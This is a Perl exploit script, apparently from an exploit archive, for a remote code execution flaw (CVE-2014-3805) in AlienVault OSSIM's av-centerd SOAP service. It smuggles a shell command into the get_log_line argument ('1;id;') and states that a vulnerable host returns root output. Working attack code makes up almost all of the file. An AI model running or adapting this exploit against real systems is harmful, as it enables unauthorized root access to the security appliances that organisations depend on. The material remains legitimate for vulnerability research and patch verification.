29 lines
No EOL
925 B
Perl
Executable file
29 lines
No EOL
925 B
Perl
Executable file
# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
|
|
# Date: 06/17/2014
|
|
# Exploit Author: Alfredo Ramirez
|
|
# Vendor Homepage: http://www.alienvault.com/
|
|
# Software Link: http://www.alienvault.com/open-threat-exchange/projects
|
|
# Version: < 4.7.0
|
|
# Tested on: Debian/Virtual Appliance
|
|
# CVE : CVE-2014-3805
|
|
|
|
#!perl -w
|
|
|
|
use SOAP::Lite;
|
|
|
|
# SSL is self-signed so we have to ignore verification.
|
|
$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;
|
|
|
|
# We simply append the 'id' command to the number of log we want to
|
|
# read.
|
|
@soap_response = SOAP::Lite
|
|
-> uri('AV/CC/Util')
|
|
-> proxy('https://172.26.22.2:40007/av-centerd')
|
|
-> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
|
|
-> result;
|
|
|
|
for (@{ $soap_response[0] }) {
|
|
print "$_\n";
|
|
}
|
|
|
|
# If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root) |